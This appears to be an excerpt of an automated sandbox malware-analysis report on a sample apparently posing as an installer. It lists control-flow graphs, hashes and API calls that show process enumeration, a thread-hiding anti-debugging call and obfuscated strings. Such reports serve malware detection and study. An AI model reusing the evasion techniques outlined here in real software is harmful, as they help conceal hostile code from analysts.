                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: }jk$;T55$L@^
                                                          • API String ID: 0-4218709813
                                                          • Opcode ID: 339f7ae9d65dc40c117d0858df137348528138877e3b81ed636ec222940047ed
                                                          • Instruction ID: 7f631d38284ef44c6552dff79c76c5247ef0eb3c9440f0f523cc9d7c3c016cdb
                                                          • Opcode Fuzzy Hash: 339f7ae9d65dc40c117d0858df137348528138877e3b81ed636ec222940047ed
                                                          • Instruction Fuzzy Hash: 0D34F8716457018FC728CF28CCD0A96B7E3EFD5314B198A6DC0968BB95EB78B54ACB40

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 7677 6c695240-6c695275 CreateToolhelp32Snapshot 7678 6c6952a0-6c6952a9 7677->7678 7679 6c6952ab-6c6952b0 7678->7679 7680 6c6952e0-6c6952e5 7678->7680 7681 6c6952b2-6c6952b7 7679->7681 7682 6c695315-6c69531a 7679->7682 7683 6c6952eb-6c6952f0 7680->7683 7684 6c695377-6c6953a1 call 6c6a2c05 7680->7684 7686 6c6952b9-6c6952be 7681->7686 7687 6c695334-6c69535d call 6c69b920 Process32FirstW 7681->7687 7690 6c695320-6c695332 Process32NextW 7682->7690 7691 6c6953a6-6c6953ab 7682->7691 7688 6c6952f2-6c6952f7 7683->7688 7689 6c695277-6c695292 CloseHandle 7683->7689 7684->7678 7686->7678 7695 6c6952c0-6c6952d1 7686->7695 7693 6c695362-6c695372 7687->7693 7688->7678 7697 6c6952f9-6c695313 7688->7697 7689->7678 7690->7693 7691->7678 7696 6c6953b1-6c6953bf 7691->7696 7693->7678 7695->7678 7697->7678
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C69524E
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: CreateSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 3332741929-0
                                                          • Opcode ID: 6cc0fa0a3cbe23298e3a0ebbf47f68b3d6749cb9eca3e52c3a0c50b07df1b050
                                                          • Instruction ID: a10652c9d707486a5f485a8c5677cc67c28ad977feee357a04057c5319f0df60
                                                          • Opcode Fuzzy Hash: 6cc0fa0a3cbe23298e3a0ebbf47f68b3d6749cb9eca3e52c3a0c50b07df1b050
                                                          • Instruction Fuzzy Hash: D0318D746083029FC7109F68C888B0ABBF4AF96755F904A2EF598C73A0E371D8498B57

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 7821 6c513886-6c51388e 7822 6c513970-6c51397d 7821->7822 7823 6c513894-6c513896 7821->7823 7824 6c5139f1-6c5139f8 7822->7824 7825 6c51397f-6c513989 7822->7825 7823->7822 7826 6c51389c-6c5138b9 7823->7826 7828 6c513ab5-6c513aba 7824->7828 7829 6c5139fe-6c513a03 7824->7829 7825->7826 7827 6c51398f-6c513994 7825->7827 7830 6c5138c0-6c5138c1 7826->7830 7832 6c513b16-6c513b18 7827->7832 7833 6c51399a-6c51399f 7827->7833 7828->7826 7831 6c513ac0-6c513ac7 7828->7831 7834 6c5138d2-6c5138d4 7829->7834 7835 6c513a09-6c513a2f 7829->7835 7836 6c51395e 7830->7836 7831->7830 7838 6c513acd-6c513ad6 7831->7838 7832->7830 7839 6c5139a5-6c5139bf 7833->7839 7840 6c51383b-6c513855 call 6c661470 call 6c661480 7833->7840 7843 6c513957-6c51395c 7834->7843 7841 6c513a35-6c513a3a 7835->7841 7842 6c5138f8-6c513955 7835->7842 7837 6c513960-6c513964 7836->7837 7845 6c513860-6c513885 7837->7845 7846 6c51396a 7837->7846 7838->7832 7847 6c513ad8-6c513aeb 7838->7847 7848 6c513a5a-6c513a5d 7839->7848 7840->7845 7849 6c513a40-6c513a57 7841->7849 7850 6c513b1d-6c513b22 7841->7850 7842->7843 7843->7836 7845->7821 7852 6c513ba1-6c513bb6 7846->7852 7847->7842 7853 6c513af1-6c513af8 7847->7853 7857 6c513aa9-6c513ab0 7848->7857 7849->7848 7855 6c513b24-6c513b44 7850->7855 7856 6c513b49-6c513b50 7850->7856 7858 6c513bc0-6c513bda call 6c661470 call 6c661480 7852->7858 7860 6c513b62-6c513b85 7853->7860 7861 6c513afa-6c513aff 7853->7861 7855->7857 7856->7830 7864 6c513b56-6c513b5d 7856->7864 7857->7837 7872 6c513be0-6c513bfe 7858->7872 7860->7842 7868 6c513b8b 7860->7868 7861->7843 7864->7837 7868->7852 7875 6c513c04-6c513c11 7872->7875 7876 6c513e7b 7872->7876 7878 6c513ce0-6c513cea 7875->7878 7879 6c513c17-6c513c20 7875->7879 7877 6c513e81-6c513ee0 call 6c513750 GetCurrentThread NtSetInformationThread 7876->7877 7896 6c513eea-6c513f04 call 6c661470 call 6c661480 7877->7896 7883 6c513d3a-6c513d3c 7878->7883 7884 6c513cec-6c513d0c 7878->7884 7881 6c513dc5 7879->7881 7882 6c513c26-6c513c2d 7879->7882 7891 6c513dc6 7881->7891 7889 6c513dc3 7882->7889 7890 6c513c33-6c513c3a 7882->7890 7886 6c513d70-6c513d8d 7883->7886 7887 6c513d3e-6c513d45 7883->7887 7885 6c513d90-6c513d95 7884->7885 7894 6c513d97-6c513db8 7885->7894 7895 6c513dba-6c513dc1 7885->7895 7886->7885 7893 6c513d50-6c513d57 7887->7893 7889->7881 7897 6c513c40-6c513c5b 7890->7897 7898 6c513e26-6c513e2b 7890->7898 7892 6c513dc8-6c513dcc 7891->7892 7892->7872 7899 6c513dd2 7892->7899 7893->7891 7894->7881 7895->7889 7900 6c513dd7-6c513ddc 7895->7900 7915 6c513f75-6c513fa1 7896->7915 7902 6c513e1b-6c513e24 7897->7902 7903 6c513e31 7898->7903 7904 6c513c7b-6c513cd0 7898->7904 7905 6c513e76-6c513e79 7899->7905 7907 6c513e36-6c513e3d 7900->7907 7908 6c513dde-6c513e17 7900->7908 7902->7892 7902->7905 7903->7858 7904->7893 7905->7877 7911 6c513e5c-6c513e5f 7907->7911 7912 6c513e3f-6c513e5a 7907->7912 7908->7902 7911->7904 7913 6c513e65-6c513e69 7911->7913 7912->7902 7913->7892 7913->7905 7919 6c514020-6c514026 7915->7919 7920 6c513fa3-6c513fa8 7915->7920 7923 6c513f06-6c513f35 7919->7923 7924 6c51402c-6c51403c 7919->7924 7921 6c51407c-6c514081 7920->7921 7922 6c513fae-6c513fcf 7920->7922 7925 6c5140aa-6c5140ae 7921->7925 7929 6c514083-6c51408a 7921->7929 7922->7925 7926 6c513f38-6c513f61 7923->7926 7927 6c5140b3-6c5140b8 7924->7927 7928 6c51403e-6c514058 7924->7928 7931 6c513f6b-6c513f6f 7925->7931 7932 6c513f64-6c513f67 7926->7932 7927->7922 7930 6c5140be-6c5140c9 7927->7930 7933 6c51405a-6c514063 7928->7933 7929->7926 7934 6c514090 7929->7934 7930->7925 7935 6c5140cb-6c5140d4 7930->7935 7931->7915 7936 6c513f69 7932->7936 7937 6c5140f5-6c51413f 7933->7937 7938 6c514069-6c51406c 7933->7938 7934->7896 7939 6c5140a7 7934->7939 7935->7939 7940 6c5140d6-6c5140f0 7935->7940 7936->7931 7937->7936 7942 6c514072-6c514077 7938->7942 7943 6c514144-6c51414b 7938->7943 7939->7925 7940->7933 7942->7932 7943->7931
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ca47735203a88273f2ece6ce78dfd4134941517f0259262ed964c7d6eb79ca88
                                                          • Instruction ID: 67623dd26f4b07e652d228c1d582eda8eb8f6105a262ef6ae1989dd6dea8a4f8
                                                          • Opcode Fuzzy Hash: ca47735203a88273f2ece6ce78dfd4134941517f0259262ed964c7d6eb79ca88
                                                          • Instruction Fuzzy Hash: CE32F532249B018FD324CF28C8E4695B7E3EFD13247698A6DC0EA4BE55D775B44ACB50

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 7969 6c513a6a-6c513a85 7970 6c513a87-6c513aa7 7969->7970 7971 6c513aa9-6c513ab0 7970->7971 7972 6c513960-6c513964 7971->7972 7973 6c513860-6c51388e 7972->7973 7974 6c51396a 7972->7974 7984 6c513970-6c51397d 7973->7984 7985 6c513894-6c513896 7973->7985 7975 6c513ba1-6c513bb6 7974->7975 7977 6c513bc0-6c513bda call 6c661470 call 6c661480 7975->7977 7990 6c513be0-6c513bfe 7977->7990 7987 6c5139f1-6c5139f8 7984->7987 7988 6c51397f-6c513989 7984->7988 7985->7984 7989 6c51389c-6c5138b9 7985->7989 7992 6c513ab5-6c513aba 7987->7992 7993 6c5139fe-6c513a03 7987->7993 7988->7989 7991 6c51398f-6c513994 7988->7991 7994 6c5138c0-6c5138c1 7989->7994 8011 6c513c04-6c513c11 7990->8011 8012 6c513e7b 7990->8012 7997 6c513b16-6c513b18 7991->7997 7998 6c51399a-6c51399f 7991->7998 7992->7989 7995 6c513ac0-6c513ac7 7992->7995 7999 6c5138d2-6c5138d4 7993->7999 8000 6c513a09-6c513a2f 7993->8000 8001 6c51395e 7994->8001 7995->7994 8002 6c513acd-6c513ad6 7995->8002 7997->7994 8004 6c5139a5-6c5139bf 7998->8004 8005 6c51383b-6c513855 call 6c661470 call 6c661480 7998->8005 8008 6c513957-6c51395c 7999->8008 8006 6c513a35-6c513a3a 8000->8006 8007 6c5138f8-6c513955 8000->8007 8001->7972 8002->7997 8010 6c513ad8-6c513aeb 8002->8010 8013 6c513a5a-6c513a5d 8004->8013 8005->7973 8014 6c513a40-6c513a57 8006->8014 8015 6c513b1d-6c513b22 8006->8015 8007->8008 8008->8001 8010->8007 8018 6c513af1-6c513af8 8010->8018 8019 6c513ce0-6c513cea 8011->8019 8020 6c513c17-6c513c20 8011->8020 8017 6c513e81-6c513ee0 call 6c513750 GetCurrentThread NtSetInformationThread 8012->8017 8013->7971 8014->8013 8021 6c513b24-6c513b44 8015->8021 8022 6c513b49-6c513b50 8015->8022 8045 6c513eea-6c513f04 call 6c661470 call 6c661480 8017->8045 8025 6c513b62-6c513b85 8018->8025 8026 6c513afa-6c513aff 8018->8026 8030 6c513d3a-6c513d3c 8019->8030 8031 6c513cec-6c513d0c 8019->8031 8027 6c513dc5 8020->8027 8028 6c513c26-6c513c2d 8020->8028 8021->7970 8022->7994 8029 6c513b56-6c513b5d 8022->8029 8025->8007 8039 6c513b8b 8025->8039 8026->8008 8040 6c513dc6 8027->8040 8037 6c513dc3 8028->8037 8038 6c513c33-6c513c3a 8028->8038 8029->7972 8033 6c513d70-6c513d8d 8030->8033 8034 6c513d3e-6c513d45 8030->8034 8032 6c513d90-6c513d95 8031->8032 8043 6c513d97-6c513db8 8032->8043 8044 6c513dba-6c513dc1 8032->8044 8033->8032 8042 6c513d50-6c513d57 8034->8042 8037->8027 8046 6c513c40-6c513c5b 8038->8046 8047 6c513e26-6c513e2b 8038->8047 8039->7975 8041 6c513dc8-6c513dcc 8040->8041 8041->7990 8048 6c513dd2 8041->8048 8042->8040 8043->8027 8044->8037 8049 6c513dd7-6c513ddc 8044->8049 8064 6c513f75-6c513fa1 8045->8064 8051 6c513e1b-6c513e24 8046->8051 8052 6c513e31 8047->8052 8053 6c513c7b-6c513cd0 8047->8053 8054 6c513e76-6c513e79 8048->8054 8056 6c513e36-6c513e3d 8049->8056 8057 6c513dde-6c513e17 8049->8057 8051->8041 8051->8054 8052->7977 8053->8042 8054->8017 8060 6c513e5c-6c513e5f 8056->8060 8061 6c513e3f-6c513e5a 8056->8061 8057->8051 8060->8053 8062 6c513e65-6c513e69 8060->8062 8061->8051 8062->8041 8062->8054 8068 6c514020-6c514026 8064->8068 8069 6c513fa3-6c513fa8 8064->8069 8072 6c513f06-6c513f35 8068->8072 8073 6c51402c-6c51403c 8068->8073 8070 6c51407c-6c514081 8069->8070 8071 6c513fae-6c513fcf 8069->8071 8074 6c5140aa-6c5140ae 8070->8074 8078 6c514083-6c51408a 8070->8078 8071->8074 8075 6c513f38-6c513f61 8072->8075 8076 6c5140b3-6c5140b8 8073->8076 8077 6c51403e-6c514058 8073->8077 8080 6c513f6b-6c513f6f 8074->8080 8081 6c513f64-6c513f67 8075->8081 8076->8071 8079 6c5140be-6c5140c9 8076->8079 8082 6c51405a-6c514063 8077->8082 8078->8075 8083 6c514090 8078->8083 8079->8074 8084 6c5140cb-6c5140d4 8079->8084 8080->8064 8085 6c513f69 8081->8085 8086 6c5140f5-6c51413f 8082->8086 8087 6c514069-6c51406c 8082->8087 8083->8045 8088 6c5140a7 8083->8088 8084->8088 8089 6c5140d6-6c5140f0 8084->8089 8085->8080 8086->8085 8091 6c514072-6c514077 8087->8091 8092 6c514144-6c51414b 8087->8092 8088->8074 8089->8082 8091->8081 8092->8080
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: e8d13ded9ad5d0aa9e76120b6df117af50424a42b660da4f13ad0ea83cb2f897
                                                          • Instruction ID: dd25991c3e18d6cd4c7d6b6dbf73d93ae8197e0727952f72187676783a56becc
                                                          • Opcode Fuzzy Hash: e8d13ded9ad5d0aa9e76120b6df117af50424a42b660da4f13ad0ea83cb2f897
                                                          • Instruction Fuzzy Hash: 7751F0711497018FE320CF28C898785B7A3AF92324F698E1DC0E65BE95DB74B44A8B81
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: 02333bae1826f2ca310cefedad9af18c9308daf8e16e135f3cabba540d1c6178
                                                          • Instruction ID: 01874fa36daee185fd8d6fddffbf3d972a67f4a4f0abfdf96766d0df7473e26a
                                                          • Opcode Fuzzy Hash: 02333bae1826f2ca310cefedad9af18c9308daf8e16e135f3cabba540d1c6178
                                                          • Instruction Fuzzy Hash: B351E271108B018FE320CF29C898795B7A3BF96324F658F1DC0E65BE95DB71B44A8B91
                                                          APIs
                                                          • GetCurrentThread.KERNEL32 ref: 6C513E9D
                                                          • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C513EAA
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: Thread$CurrentInformation
                                                          • String ID:
                                                          • API String ID: 1650627709-0
                                                          • Opcode ID: 2aa522b5ebb439bcd979fbae0c30a490788c47600126530c878949cb2d2a5458
                                                          • Instruction ID: e8de23f92bffde381e2be94cd16af3dedf55b2bfbfb9b190b206d201ff39393a
                                                          • Opcode Fuzzy Hash: 2aa522b5ebb439bcd979fbae0c30a490788c47600126530c878949cb2d2a5458
                                                          • Instruction Fuzzy Hash: 2031F271159B01CFE320CF24CCA87C6B7A3AF96318F294E1DC0A65BE91DB79740A9B51
                                                          APIs
                                                          • GetCurrentThread.KERNEL32 ref: 6C513E9D
                                                          • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C513EAA
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: Thread$CurrentInformation
                                                          • String ID:
                                                          • API String ID: 1650627709-0
                                                          • Opcode ID: c8ead7b125dcb314672ffefbe7f5001f2aee0f16ce1c99d6f70aa4450f94c884
                                                          • Instruction ID: 5687a421fafee47e88275ae8762de78756b37cbaa5316437ad5f5aaf8e5fefe7
                                                          • Opcode Fuzzy Hash: c8ead7b125dcb314672ffefbe7f5001f2aee0f16ce1c99d6f70aa4450f94c884
                                                          • Instruction Fuzzy Hash: EB310F31108701CFE720CF28C8A8796B7A6AF86308F254E1DC0E64BE81DB71B449CB92
                                                          APIs
                                                          • GetCurrentThread.KERNEL32 ref: 6C513E9D
                                                          • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C513EAA
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: Thread$CurrentInformation
                                                          • String ID:
                                                          • API String ID: 1650627709-0
                                                          • Opcode ID: 80633dc29eaf2cf5a97c6a8a3035929e67c016fe919b539ef7032833d126cc2a
                                                          • Instruction ID: 9b48c0bb329d1cedbbaa90b4b9b9b4125f4f6eb4ed7b0bd95141deae7b8b1d0b
                                                          • Opcode Fuzzy Hash: 80633dc29eaf2cf5a97c6a8a3035929e67c016fe919b539ef7032833d126cc2a
                                                          • Instruction Fuzzy Hash: 0321F47015C701CFE324CF64CCA879677B6AF46318F144E2DC0A68BE90DB75B4489B52
                                                          APIs
                                                          • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6C695130
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ManagerOpen
                                                          • String ID:
                                                          • API String ID: 1889721586-0
                                                          • Opcode ID: 5cc81ea195e6444c5bd0d03724d100e8aaf2069115b79c71d14dd6e96fda0f6a
                                                          • Instruction ID: 9487c23b32f8242ade45902a23672f8fa61e5dd8dcc24b452af732fab6d8af6f
                                                          • Opcode Fuzzy Hash: 5cc81ea195e6444c5bd0d03724d100e8aaf2069115b79c71d14dd6e96fda0f6a
                                                          • Instruction Fuzzy Hash: EB3128B4608342EFC710CF28C584B4ABBF0EB89755F508A6EF998C6360C371C9499B67
                                                          APIs
                                                          • FindFirstFileA.KERNEL32(?,?), ref: 6C68AEDC
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0
                                                          • Opcode ID: 9f2b22aae14be8562f36e2e884df30d6b21fd13c872815ff4ae30684644f3200
                                                          • Instruction ID: 523e4d1fb9664409397be2cc66052226d8162cba69e657e133d768e3c48d2437
                                                          • Opcode Fuzzy Hash: 9f2b22aae14be8562f36e2e884df30d6b21fd13c872815ff4ae30684644f3200
                                                          • Instruction Fuzzy Hash: 7B1155B040A380AFD7108E28D44445EBBE4BF8A315F148E59F8A8CB7D2D334CC848B2A
                                                          APIs
                                                          • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6C66ABA7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.1687255835.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true
                                                          • Associated: 00000007.00000002.1687222213.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688607943.000000006C6B8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1688683286.000000006C6C8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689449994.000000006C793000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1689513877.000000006C799000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000007.00000002.1690286574.000000006C882000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_6c510000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID: $53N!$53N!$H$I_#]$J_#]$J_#]$Y<Uq$Y<Uq$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$f@n`$f@n`$jinc$|
                                                          • API String ID: 2738559852-1563143607
                                                          • Opcode ID: a3d69fc28794041803f55125f3a3fa3ba80d13e9ded7fc97a29b1855dba788b0
                                                          • Instruction ID: afc9c3d8bef265b729fe5fb0999ea2b7b4974f19684ec5e3d0e30fdbd3ec5ad9
                                                          • Opcode Fuzzy Hash: a3d69fc28794041803f55125f3a3fa3ba80d13e9ded7fc97a29b1855dba788b0
                                                          • Instruction Fuzzy Hash: 6162497060D381CFC724CF29C490AAABBE2ABD9304F14891EF599CBB52D735D8459B47

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
